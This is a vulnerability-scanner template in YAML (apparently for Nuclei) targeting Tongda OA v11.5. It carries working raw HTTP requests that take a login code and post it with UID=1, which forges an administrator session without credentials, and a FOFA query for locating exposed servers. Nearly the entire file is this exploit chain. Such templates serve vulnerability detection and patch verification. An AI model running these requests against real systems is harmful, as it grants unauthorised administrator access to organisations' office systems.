http:
    - cookie-reuse: true
      extractors:
        - internal: true
          json:
            - .codeuid
          name: codeuid
          part: body_1
          type: json
      matchers:
        - condition: and
          dsl:
            - contains(body_1,'codeuid') && contains(body_2,'general') && contains(body_3,'admin') && contains(body_3,'uid')
          type: dsl
      matchers-condition: and
      raw:
        - |
          GET /ispirit/login_code.php HTTP/1.1
          Host: {{Hostname}}
        - |
          POST /logincheck_code.php HTTP/1.1
          Host:  {{Hostname}}
          User-Agent: Moziilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
          Content-Type: application/x-www-form-urlencoded

          CODEUID={{url_encode(codeuid)}}&UID=1
        - |
          GET /general/index.php HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
id: tongda-oa-v11-5-login-code-userlogin
info:
    author: pphua,hufei
    description: 该漏洞类型为任意用户伪造，未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。
    metadata:
        fofa-query: office anywhere 2017
        verified: true
    name: 通达OA v11.5 login_code.php 任意用户登录
    reference:
        - https://www.cnblogs.com/bink1/p/13328579.html
        - https://github.com/Threekiii/Vulnerability-Wiki/blob/master/docs-base/docs/oa/%E9%80%9A%E8%BE%BEOA-v11.5-logincheck_code.php-%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md
    severity: medium
    tags:
        - tongda
        - userlogin
        - 通达oa
